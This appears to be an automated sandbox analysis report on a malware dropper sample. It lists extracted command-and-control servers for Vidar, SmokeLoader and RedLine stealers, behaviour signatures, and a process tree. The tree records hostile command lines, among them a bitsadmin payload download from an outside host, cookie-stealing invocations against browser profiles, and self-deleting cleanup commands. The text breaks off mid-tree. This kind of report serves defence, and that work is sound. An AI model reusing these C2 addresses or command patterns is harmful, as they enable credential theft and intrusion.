Resubmissions

13-08-2021 10:16

210813-wpta271jdx 10

08-08-2021 23:00

210808-fgs5g9pxfs 10

07-08-2021 23:12

210807-g2jw1lmd4a 10

07-08-2021 16:10

210807-51nhct4kfx 10

06-08-2021 23:43

210806-gc2271nxwj 10

06-08-2021 06:00

210806-f443x39x8a 10

05-08-2021 17:08

210805-97y6banvvx 10

04-08-2021 17:25

210804-hkxx2ntr8x 10

04-08-2021 12:12

210804-rjbg4b4y7n 10

03-08-2021 17:12

210803-r2h7ytjwqj 10

Analysis

  • max time kernel
    310s
  • max time network
    348s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    27-07-2021 08:13

General

  • Target

    8 (21).exe

  • Size

    3.0MB

  • MD5

    bb072cad921aa5ce8b97706ce01bc570

  • SHA1

    18bf034906c1341b7817e7361ad27a4425d820bd

  • SHA256

    817a50d00909383bbef41e6f4e61b527d55f0873bcf745b29dbba75f52fe2e97

  • SHA512

    d40e5f77d882ed29bd9de5a6848072e2f81cd02176955e2b1a4aedcdf4eb687d77bebe33cef0c7d702bc828181755f86e2564523d476adbb785f396a5ce1d474

Malware Config

Extracted

Family

vidar

Version

39.6

Botnet

933

C2

https://sslamlssa1.tumblr.com/

Attributes
  • profile_id

    933

Extracted

Family

smokeloader

Version

2020

C2

http://conceitosseg.com/upload/

http://integrasidata.com/upload/

http://ozentekstil.com/upload/

http://finbelportal.com/upload/

http://telanganadigital.com/upload/

rc4.i32
rc4.i32

Extracted

Family

redline

Botnet

sel21

C2

salkefard.xyz:80

Extracted

Family

redline

Botnet

23_7_r

C2

zertypelil.xyz:80

Extracted

Family

vidar

Version

39.7

Botnet

865

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    865

Extracted

Family

vidar

Version

39.7

Botnet

921

C2

https://shpak125.tumblr.com/

Attributes
  • profile_id

    921

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba Payload 2 IoCs
  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 7 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE GCleaner Downloader Activity M1
  • suricata: ET MALWARE Generic Password Stealer User Agent Detected (RookIE)
  • suricata: ET MALWARE Potential Dridex.Maldoc Minimal Executable Request
  • suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
  • suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 1 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 4 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 7 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 14 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 26 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    1⤵
      PID:1008
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
      1⤵
      • Drops file in System32 directory
      PID:948
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2304
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
        1⤵
          PID:2340
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2592
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s WpnService
            1⤵
              PID:2568
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s Browser
              1⤵
                PID:2488
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
                1⤵
                  PID:1868
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s SENS
                  1⤵
                    PID:1436
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                    1⤵
                      PID:1348
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Themes
                      1⤵
                        PID:1256
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                        1⤵
                          PID:1088
                        • C:\Users\Admin\AppData\Local\Temp\8 (21).exe
                          "C:\Users\Admin\AppData\Local\Temp\8 (21).exe"
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2156
                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:2660
                            • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\setup_install.exe
                              "C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\setup_install.exe"
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Suspicious use of WriteProcessMemory
                              PID:4024
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_1.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:1372
                                • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_1.exe
                                  sonia_1.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of WriteProcessMemory
                                  PID:1368
                                  • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_1.exe
                                    "C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_1.exe" -a
                                    6⤵
                                    • Executes dropped EXE
                                    PID:1532
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_2.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3428
                                • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_2.exe
                                  sonia_2.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Loads dropped DLL
                                  • Checks SCSI registry key(s)
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious behavior: MapViewOfSection
                                  PID:2140
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_3.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3852
                                • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_3.exe
                                  sonia_3.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Modifies system certificate store
                                  PID:756
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 756 -s 928
                                    6⤵
                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                    • Program crash
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4772
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c sonia_4.exe
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:3104
                                • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_4.exe
                                  sonia_4.exe
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:2384
                                  • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                    "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                    6⤵
                                    • Executes dropped EXE
                                    PID:4276
                                    • C:\Users\Admin\AppData\Local\Temp\jhuuee.exe
                                      "C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      PID:4416
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        PID:4888
                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                        8⤵
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        PID:5048
                                    • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                      "C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe"
                                      7⤵
                                      • Executes dropped EXE
                                      • Suspicious use of SetThreadContext
                                      PID:4348
                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        8⤵
                                        • Executes dropped EXE
                                        PID:4128
                                      • C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        C:\Users\Admin\AppData\Local\Temp\OLKbrowser.exe
                                        8⤵
                                        • Executes dropped EXE
                                        PID:3864
                                    • C:\Users\Admin\AppData\Local\Temp\setup 326.exe
                                      "C:\Users\Admin\AppData\Local\Temp\setup 326.exe"
                                      7⤵
                                        PID:4616
                                        • C:\Windows\winnetdriv.exe
                                          "C:\Users\Admin\AppData\Local\Temp\setup 326.exe" 1627373987 0
                                          8⤵
                                          • Executes dropped EXE
                                          PID:2632
                                      • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                        "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                        7⤵
                                        • Executes dropped EXE
                                        PID:1196
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 804
                                          8⤵
                                          • Program crash
                                          PID:5572
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 840
                                          8⤵
                                          • Program crash
                                          PID:5772
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 892
                                          8⤵
                                          • Program crash
                                          PID:5964
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 992
                                          8⤵
                                          • Program crash
                                          PID:6140
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 776
                                          8⤵
                                          • Program crash
                                          PID:5256
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 776
                                          8⤵
                                          • Program crash
                                          PID:4468
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1196 -s 960
                                          8⤵
                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                          • Program crash
                                          PID:5544
                                      • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                        "C:\Users\Admin\AppData\Local\Temp\zhangd.exe"
                                        7⤵
                                          PID:4404
                                          • C:\Users\Admin\AppData\Local\Temp\zhangd.exe
                                            "C:\Users\Admin\AppData\Local\Temp\zhangd.exe" -a
                                            8⤵
                                            • Executes dropped EXE
                                            PID:4916
                                        • C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Chrome Update.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5036
                                          • C:\Windows\system32\WerFault.exe
                                            C:\Windows\system32\WerFault.exe -u -p 5036 -s 996
                                            8⤵
                                            • Program crash
                                            PID:3948
                                  • C:\Windows\SysWOW64\cmd.exe
                                    C:\Windows\system32\cmd.exe /c sonia_5.exe
                                    4⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:3396
                                    • C:\Users\Admin\AppData\Local\Temp\7zS46AD2414\sonia_5.exe
                                      sonia_5.exe
                                      5⤵
                                      • Executes dropped EXE
                                      • Checks computer location settings
                                      PID:3940
                                      • C:\Users\Admin\Documents\fSN3rHqT0dWVhewNVW4XsGVo.exe
                                        "C:\Users\Admin\Documents\fSN3rHqT0dWVhewNVW4XsGVo.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        PID:5056
                                      • C:\Users\Admin\Documents\L6aiFzeNbsYbzcWr1t4fgQBk.exe
                                        "C:\Users\Admin\Documents\L6aiFzeNbsYbzcWr1t4fgQBk.exe"
                                        6⤵
                                        • Executes dropped EXE
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5084
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd.exe /c taskkill /f /im chrome.exe
                                          7⤵
                                            PID:5664
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /f /im chrome.exe
                                              8⤵
                                              • Kills process with taskkill
                                              PID:4316
                                        • C:\Users\Admin\Documents\eizpH2ELX1yLSZEKfAi4RHkp.exe
                                          "C:\Users\Admin\Documents\eizpH2ELX1yLSZEKfAi4RHkp.exe"
                                          6⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5072
                                          • C:\Users\Admin\Documents\eizpH2ELX1yLSZEKfAi4RHkp.exe
                                            C:\Users\Admin\Documents\eizpH2ELX1yLSZEKfAi4RHkp.exe
                                            7⤵
                                            • Executes dropped EXE
                                            • Loads dropped DLL
                                            • Checks processor information in registry
                                            PID:5100
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c taskkill /im eizpH2ELX1yLSZEKfAi4RHkp.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\eizpH2ELX1yLSZEKfAi4RHkp.exe" & del C:\ProgramData\*.dll & exit
                                              8⤵
                                                PID:2612
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill /im eizpH2ELX1yLSZEKfAi4RHkp.exe /f
                                                  9⤵
                                                  • Kills process with taskkill
                                                  PID:6132
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 6
                                                  9⤵
                                                  • Delays execution with timeout.exe
                                                  PID:5240
                                          • C:\Users\Admin\Documents\EAn_pTkdNvADM0hRtXQJlFFO.exe
                                            "C:\Users\Admin\Documents\EAn_pTkdNvADM0hRtXQJlFFO.exe"
                                            6⤵
                                              PID:5048
                                              • C:\Users\Admin\Documents\EAn_pTkdNvADM0hRtXQJlFFO.exe
                                                C:\Users\Admin\Documents\EAn_pTkdNvADM0hRtXQJlFFO.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4496
                                            • C:\Users\Admin\Documents\rY2tMjVQEatLvXKIPSLmWCgU.exe
                                              "C:\Users\Admin\Documents\rY2tMjVQEatLvXKIPSLmWCgU.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5096
                                            • C:\Users\Admin\Documents\kZR7VG7tATW__9bIIivgI1Ua.exe
                                              "C:\Users\Admin\Documents\kZR7VG7tATW__9bIIivgI1Ua.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              PID:528
                                              • C:\Users\Admin\Documents\kZR7VG7tATW__9bIIivgI1Ua.exe
                                                C:\Users\Admin\Documents\kZR7VG7tATW__9bIIivgI1Ua.exe
                                                7⤵
                                                • Executes dropped EXE
                                                PID:4852
                                            • C:\Users\Admin\Documents\27EeewhaAJtrg4HXt_RmZbS2.exe
                                              "C:\Users\Admin\Documents\27EeewhaAJtrg4HXt_RmZbS2.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4540
                                              • C:\Users\Admin\AppData\Roaming\updata.exe
                                                C:\Users\Admin\AppData\Roaming\updata.exe updata
                                                7⤵
                                                • Executes dropped EXE
                                                • Suspicious use of SetThreadContext
                                                PID:5200
                                                • C:\Users\Admin\AppData\Roaming\updata.exe
                                                  "C:\Users\Admin\AppData\Roaming\updata.exe"
                                                  8⤵
                                                  • Executes dropped EXE
                                                  PID:2788
                                            • C:\Users\Admin\Documents\TTCscpQ4hplq4X1qFul_KiP5.exe
                                              "C:\Users\Admin\Documents\TTCscpQ4hplq4X1qFul_KiP5.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4160
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 656
                                                7⤵
                                                • Program crash
                                                PID:1364
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 672
                                                7⤵
                                                • Program crash
                                                PID:3916
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 676
                                                7⤵
                                                • Executes dropped EXE
                                                • Drops file in Windows directory
                                                • Program crash
                                                PID:4616
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4160 -s 672
                                                7⤵
                                                • Program crash
                                                PID:5188
                                            • C:\Users\Admin\Documents\9mIKw1MOYLeuqK2tK4exUrkt.exe
                                              "C:\Users\Admin\Documents\9mIKw1MOYLeuqK2tK4exUrkt.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              PID:4388
                                              • C:\Users\Admin\Documents\9mIKw1MOYLeuqK2tK4exUrkt.exe
                                                "C:\Users\Admin\Documents\9mIKw1MOYLeuqK2tK4exUrkt.exe"
                                                7⤵
                                                • Executes dropped EXE
                                                • Modifies data under HKEY_USERS
                                                PID:5864
                                            • C:\Users\Admin\Documents\D8HXE9wb2cqK9iUcmsmhLJMd.exe
                                              "C:\Users\Admin\Documents\D8HXE9wb2cqK9iUcmsmhLJMd.exe"
                                              6⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              • Checks processor information in registry
                                              PID:4644
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c taskkill /im D8HXE9wb2cqK9iUcmsmhLJMd.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\D8HXE9wb2cqK9iUcmsmhLJMd.exe" & del C:\ProgramData\*.dll & exit
                                                7⤵
                                                  PID:5856
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /im D8HXE9wb2cqK9iUcmsmhLJMd.exe /f
                                                    8⤵
                                                    • Kills process with taskkill
                                                    PID:6028
                                                  • C:\Windows\SysWOW64\timeout.exe
                                                    timeout /t 6
                                                    8⤵
                                                    • Delays execution with timeout.exe
                                                    PID:5932
                                              • C:\Users\Admin\Documents\yaxOnRYtxH3KmxJRo8Sb4Oce.exe
                                                "C:\Users\Admin\Documents\yaxOnRYtxH3KmxJRo8Sb4Oce.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Checks BIOS information in registry
                                                • Checks whether UAC is enabled
                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                PID:4568
                                              • C:\Users\Admin\Documents\ahyIrCOpW_7Ep852C2bqbabY.exe
                                                "C:\Users\Admin\Documents\ahyIrCOpW_7Ep852C2bqbabY.exe"
                                                6⤵
                                                • Executes dropped EXE
                                                • Drops startup file
                                                PID:4548
                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                  7⤵
                                                    PID:5204
                                                  • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                    C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5920
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:4428
                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                    7⤵
                                                    • Executes dropped EXE
                                                    PID:5204
                                                • C:\Users\Admin\Documents\HCfnQDZL3lqrFqQovimc1b7Q.exe
                                                  "C:\Users\Admin\Documents\HCfnQDZL3lqrFqQovimc1b7Q.exe"
                                                  6⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of SetThreadContext
                                                  PID:4508
                                                  • C:\Users\Admin\Documents\HCfnQDZL3lqrFqQovimc1b7Q.exe
                                                    C:\Users\Admin\Documents\HCfnQDZL3lqrFqQovimc1b7Q.exe
                                                    7⤵
                                                      PID:4496
                                                    • C:\Users\Admin\Documents\HCfnQDZL3lqrFqQovimc1b7Q.exe
                                                      C:\Users\Admin\Documents\HCfnQDZL3lqrFqQovimc1b7Q.exe
                                                      7⤵
                                                      • Executes dropped EXE
                                                      PID:2136
                                                  • C:\Users\Admin\Documents\LhmQKjui2FV1I8RHclQT04eG.exe
                                                    "C:\Users\Admin\Documents\LhmQKjui2FV1I8RHclQT04eG.exe"
                                                    6⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:4456
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                      7⤵
                                                        PID:1640
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                        7⤵
                                                          PID:5152
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                          7⤵
                                                            PID:4340
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                            7⤵
                                                              PID:5300
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                              7⤵
                                                                PID:5296
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                7⤵
                                                                  PID:6124
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                  7⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:5824
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                  7⤵
                                                                  • Download via BitsAdmin
                                                                  PID:6112
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -psem3MClgGowU1IW -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  7⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:4996
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -ps6ek4NyqJ7KMDc8 -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  7⤵
                                                                    PID:5324
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                    7⤵
                                                                      PID:4728
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                      7⤵
                                                                        PID:5144
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                        7⤵
                                                                          PID:4356
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                          7⤵
                                                                            PID:5088
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                            7⤵
                                                                              PID:5976
                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\YpwZeOdFLWWW\YpwZeOdFLWWW.dll" YpwZeOdFLWWW
                                                                              7⤵
                                                                              • Loads dropped DLL
                                                                              PID:4768
                                                                              • C:\Windows\system32\rundll32.exe
                                                                                C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\YpwZeOdFLWWW\YpwZeOdFLWWW.dll" YpwZeOdFLWWW
                                                                                8⤵
                                                                                • Loads dropped DLL
                                                                                • Drops file in System32 directory
                                                                                • Drops file in Program Files directory
                                                                                PID:1772
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsm61DA.tmp\tempfile.ps1"
                                                                              7⤵
                                                                              • Drops file in Program Files directory
                                                                              PID:5856
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
